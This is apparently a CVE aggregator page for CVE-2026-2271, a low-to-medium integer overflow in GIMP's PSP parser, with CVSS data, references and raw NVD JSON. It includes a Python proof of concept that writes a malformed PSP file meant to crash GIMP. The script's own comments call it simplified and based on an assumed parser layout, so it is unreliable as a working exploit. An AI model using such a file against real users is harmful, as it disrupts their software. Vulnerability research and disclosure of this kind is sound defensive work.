CVE-2026-2271

Description

A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.2.0:rc2:*:*:*:*:*:* - VULNERABLE

GIMP (具体受影响版本需参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# PoC for CVE-2026-2271: GIMP PSP Integer Overflow
# This script generates a malformed PSP file designed to trigger
# an integer overflow in the read_creator_block() function.

def create_exploit_file(filename):
    # PSP file signature (simplified for PoC)
    signature = b"Paint Shop Pro Image File\n\x0a\x00\x00\x00\x00\x1a"
    
    # Malicious block header
    # We aim to trigger an overflow in memory allocation calculation.
    # Assuming the parser does: size = length + header_size
    # If length is 0xFFFFFFFF, and header_size is small, size wraps around.
    block_id = 0x00  # Placeholder for creator block ID
    malicious_length = 0xFFFFFFFF  # Max 32-bit unsigned int
    
    with open(filename, "wb") as f:
        f.write(signature)
        # Write Block ID (Little Endian)
        f.write(struct.pack("<I", block_id))
        # Write Malicious Length (Little Endian)
        f.write(struct.pack("<I", malicious_length))
        
        # Note: Depending on the parser, additional padding might be required
        # to reach the vulnerable read operation.
        
    print(f"[+] Generated malicious file: {filename}")
    print(f"[+] Open this file in a vulnerable version of GIMP to trigger the crash.")

if __name__ == "__main__":
    create_exploit_file("crash_gimp.psp")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2271
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2271
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2271/
[4] VulDB https://vuldb.com/cve/CVE-2026-2271
[5] https://access.redhat.com/security/cve/CVE-2026-2271
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2438429
[7] https://gitlab.gnome.org/GNOME/gimp/-/issues/15732

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2271", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:04.713", "lastModified": "2026-04-21T15:24:47.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en el analizador de archivos PSP (Paint Shop Pro) de GIMP. Un atacante remoto podría explotar una vulnerabilidad de desbordamiento de entero en la función read_creator_block() al proporcionar un archivo de imagen PSP especialmente diseñado. Esta vulnerabilidad ocurre cuando un valor de longitud de 32 bits del archivo se utiliza para la asignación de memoria sin una validación adecuada, lo que lleva a un desbordamiento de montículo y una escritura fuera de límites. La explotación exitosa podría resultar en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.2.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "2585D713-54B3-494C-99DC-53E3A7CE0CFE"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-2271", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438429", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15732", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}